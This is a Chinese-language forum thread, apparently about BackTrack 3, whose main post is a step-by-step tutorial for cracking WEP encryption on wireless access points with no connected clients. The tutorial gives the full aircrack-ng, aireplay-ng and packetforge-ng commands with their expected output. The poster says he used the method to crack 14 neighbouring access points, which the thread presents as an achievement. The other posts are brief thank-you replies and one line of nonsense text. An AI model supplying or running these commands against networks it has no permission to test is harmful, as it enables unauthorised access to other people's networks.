u盘启动bt3实现中文菜单

swqfnet

更多更多更多

maowu

回复一下吗，好吧

hanbing

瞧一瞧,看一看

hanbing

瞧一瞧,看一看 ddd

soyang

一直都在支持你啦

boboxyz

菜鸟福音！！！

hzchcsb

[原创]参赛贴 BT2、BT3下破解无客户端wep 上图 前面发了[原创]参赛 菜鸟BT2破解无客户端wep简明教程 转自中国无线门户,原文地址：http://forum.anywlan.com/dispbbs.asp?boardID=15&ID=7444&page=1 兄弟们强烈要求上图，苦于菜鸟，不懂得如何在bt环境下截图，本版管理员老大及时发了bt下截图贴,现场学会。正好下载并刻录了bt3，就在bt3里用同样的方式破解，并截图成功（感谢本版管理员，又学了一招）。 并将原帖整理，重新贴出来，所有的命令和过程全全程截图，希望对各位像我这样的菜鸟有所帮助—— 俺是正宗菜鸟，不懂linux，甚至看不到e文，但在本论坛泡了两个星期，成功用BT2（u盘启动）破解我家周围14个wep加密的AP,尤其是，用BT2破解了4长期无客户端的AP.可见，本论坛是何等的实用。在此，特别感谢haohamaru大侠和longas大侠，更感谢本论坛提供了一个绝好的学习实践平台。 装备： dell D410笔记本、linksys wusb54g v4 （加装12db 八木定向天线）、bt2 usb 系统 1.先升级Aircrack。因破解环境往往无法在线升级bt2，故先将aircrack-ng-0.9.1.tar.gz 下载到本地硬盘，我是放在c盘的根目录下。 用usb bt2 系统启动bt2，进入界面后，打开一个窗口， 输入cd /mnt 输入再输入 ls 这样你就能看到你的硬盘名 一般是sda1 hda1 或hdc1（我的就是hda1） 再输入 cd /mnt/hda1 或者cd /mnt/hdc1, 就是进入你的c盘根目录。 再输入 tar -xf aircrack-ng-0.9.1.tar.gz 再输入 cd aircrack-ng-0.9.1 再输入 make clean && make && make install 这样，你就可以直接在新版本下破解了。 2．输入ifconfig –a 查看网卡 （顺便记下自己网卡的mac，后面要用到） 我的网卡是rausb0 再输入ifconfig –a rausb0 up 加载usb网卡驱动 3.输入airmon-ng start rausb0 6 激活网卡的Monitor模式 后面的6 是你要破解ap 的工作频道 根据实际，换成你破解的ap的实际工作频道（下同）。 4.输入抓包命令，抓包并查看你要破解的ap的essid 和 mac 输入命令 airodump-ng --ivs -w name -c 6 rausb0 ，其中，rausb0是你破解用的网卡接口名（下同），这样，你的窗口将显示一个工作站，可以看到你要破解的ap的essid 和mac ，并记下ap的essid 和mac。 5.上面窗口不关闭，另开一个窗口，输入命令，用自己的网卡连接要破解的ap 输入 aireplay-ng -1 0 -e ap的essid -a ap的mac -h 自己网卡的mac rausb0 这时，系统将回显 Sending Authentication Request Authentication successful Sending Association Request Association successful :-) 6．输入aireplay-ng -5 -b ap的mac -h 自己网卡的mac rausb0 来获得xor文件 如果一切顺利，系统将回显 Use this packet ? 输入y 回车 再输入ls 查看当前目录，你将看到刚才生成的一个后缀名为xor 的文件。 7．输入packetforge-ng -0 -a ap的mac -h 自己网卡的mac -k 255.255.255.255 -l 255.255.255.255 -y fragment -xxxx-xxxxxx.xor -w mrarp 其中，–l中的l是L的小写，别和1混淆，而其中的xxxx-xxxx.xor 是你刚才生成的文件名 系统回显：Wrote packet to: mrarp 8．输入aireplay-ng -2 –r mrarp -x 1024 rausb0 ，发包攻击.其中，-x 1024 是限定发包速度，避免网卡死机，我选择的是512。 输入y 回车 攻击开始 这时，前面的抓包窗口上的data将迅速增加。 到数据增加到3万以上时，另开窗口，启动 aircrack-ng -n 64 -b ap的mac name-01.ivs 其中 64 是64位密码，如果是128位，换成128即可。 我个人感觉，bt2（u盘启动） 对pc卡 、pcm 卡 支持不怎么好——我一块 声宝la4111、一块神脑2511大功率无线网卡都不支持发包攻击，最终的成功来源于linksys wusb54g v4 。 使用该卡破解，两点需要注意： 一是该卡的天线和发射功率都比较次，对较弱的信号，需要对网卡天线进行改造（具体参考坛子上的改造方式，我用的是12db的八木定向天线），否则无法发包。 二是 由于该卡功率有限，在发包攻击时，最好限定发包数量，否则容易发生网卡发热，出现“死卡”现象。 具体是： 在破解有客户端时，发包命令 aireplay-ng -3 -b 路由mac -h 客户mac rausb0 在该命令中加入 -x 参数，限定发包速度。 我用的是1024 ，甚至512 。具体的命令为aireplay-ng -3 -b 路由mac -h 客户mac -x 512 rsusb0 而在破解无客户端时，发包命令 aireplay-ng -2 –r arp rausb0 中间同样插入参数 -x 1024 或 -x 512 我选择的是 aireplay-ng -2 –r arp -x 512 rausb0 。

xlhlh

谢谢需哟啊啊

ruberman

好好好,以后我们就可以有希望了,具体的怎么样操作说说

simonwei

中文速度慢点吧?

netfengzhi

硬盘我试过不行，现在没办法了，只有试着用U盘啦

yaohongbhl

二代人复合接口氯碱化工